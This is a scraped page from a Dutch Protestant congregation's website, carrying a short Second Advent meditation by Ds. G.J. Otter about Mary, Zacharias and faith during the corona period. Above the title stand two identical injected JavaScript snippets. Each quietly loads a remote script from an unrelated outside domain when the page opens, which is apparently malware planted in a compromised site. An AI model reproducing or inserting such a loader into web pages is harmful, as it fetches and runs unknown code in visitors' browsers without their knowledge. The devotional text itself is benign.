;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tweede Advent ... Vol verwachting - PKN Damwâld

Tweede Advent … Vol verwachting

Gepubliceerd op: vrijdag 3 december 2021

Of is het misschien vol teleurstelling? Het is namelijk verdrietig dat heel wat bijeenkomsten afgezegd worden en corona in de levens van mensen diep inslaat. Blijven geloven is niet iets dat vanzelfsprekend is. Van Maria en Zacharias horen we over het wonder dat God naar ons mensen omziet, ook in een lastige situatie. Voor Maria was het onzeker hoe het huwelijk met Jozef zou verlopen en voor Zacharias hoe hij – samen met Elisabeth – op zijn hoge leeftijd voor een kind moest gaan zorgen. Toch zingen Maria en Zacharias: “Mijn ziel maakt groot de Here en mijn geest heeft zich verblijd over God mijn Heiland omdat Hij heeft omgezien naar de lage staat van Zijn dienstmaagd” zingt Maria en Zacharia looft “De innerlijke barmhartigheid waarmee de Opgang uit de hoogte naar ons zal omzien” (Lucas 1 vers 47 & 78)

 Ds. G.J. Otter